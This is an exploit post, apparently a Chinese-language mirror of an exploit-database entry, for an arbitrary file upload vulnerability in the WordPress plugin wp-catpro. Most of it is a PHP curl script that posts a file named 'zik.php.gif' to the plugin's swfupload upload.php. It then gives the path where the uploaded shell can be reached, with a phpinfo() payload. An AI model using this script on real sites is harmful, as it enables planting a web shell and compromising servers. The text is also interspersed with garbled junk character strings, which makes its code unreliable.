WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

9 ~, C, c. t2 U9 E* Y, _  x+ w作者  => Zikou-16
& h: W' D4 |( C$ X4 q: Z* z0 w邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
) J7 s7 _. s2 T+ E8 K" A3 w####

#=> Exploit 信息:
/ v1 e# d7 s/ m$ B------------------
# 攻击者可以上传 file/shell.php.gif
' ^% u- p' C+ C5 p0 c# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# T: z+ e* J/ A! F( @% H# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
! J7 V5 Y! v" Q------------------

4 e+ N0 X. P- q# ^#=> Exploit
-----------
2 v# d6 z' n  \! q" H<?php
1 K9 u& }5 H& }3 L1 ?; L
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
8 h9 Z5 t5 |# m) Earray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
: Q' x, n+ c' V* K0 ^9 z! q5 s$postResult = curl_exec($ch);
curl_close($ch);

9 s+ d) U! u5 X( A8 v2 _& R$ Kprint "$postResult";

( @+ _4 L. ^& v7 k- t5 lShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
9 \3 E2 L+ ^% A8 C<?php
! u9 E' m( r6 I3 @9 nphpinfo();
$ I% K9 M) e! K5 c?>